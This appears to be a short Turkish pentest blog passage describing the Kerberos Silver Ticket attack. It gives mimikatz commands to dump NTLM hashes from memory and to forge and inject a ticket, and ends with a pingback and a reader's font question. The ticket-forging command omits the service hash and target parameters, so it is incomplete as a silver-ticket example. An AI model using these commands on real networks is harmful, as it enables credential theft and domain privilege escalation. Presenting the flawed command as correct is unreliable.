Okunması gereken yazılar:
Silver Ticket tekniğinde saldırganın amacı, hizmet veren servis hesabına ait NTLM hash’i ile TGS oluşturarak domain üzerindeki yetkilerini yükseltmektir.
Silver Ticket’ı oluşturmak için servise ait olan kullanıcının NTLM hash’in bilinmesi gerekmektedir (Bknz. Kerberoasting).
Makine üzerindeki NTLM hash’lerini almak için mimikatz’i kullanabiliriz.
mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords
Mimikatz yardımı ile Silver Ticket’ı oluşturabiliriz.
mimikatz# kerberos::golden /user:evil /domain:pentest.local /sid:S-1-5-21-434157810-3574284310-2996746512-500 /ticket:evil.tck /ptt
[…] olarak açıklarken kullandığım cümleler bu blog yazılarından alınmadır ;Silver Ticket : https://umuttosun.com/?p=230 Golden Ticket : https://umuttosun.com/?p=232 Pass the Ticket : https://umuttosun.com/?p=217 […]
gereksiz bir şey olcak ama Macbookda kullandığınız font nedir acaba